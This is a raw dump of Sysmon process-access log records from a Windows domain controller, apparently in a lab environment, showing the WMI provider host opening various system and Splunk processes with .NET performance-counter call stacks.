13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006332Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006331Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006330Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006329Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006328Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006327Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006326Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006325Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006324Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006323Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006322Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006321Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006320Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006319Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006318Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006317Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006316Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006315Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006314Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006313Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006312Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006311Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006310Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006309Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 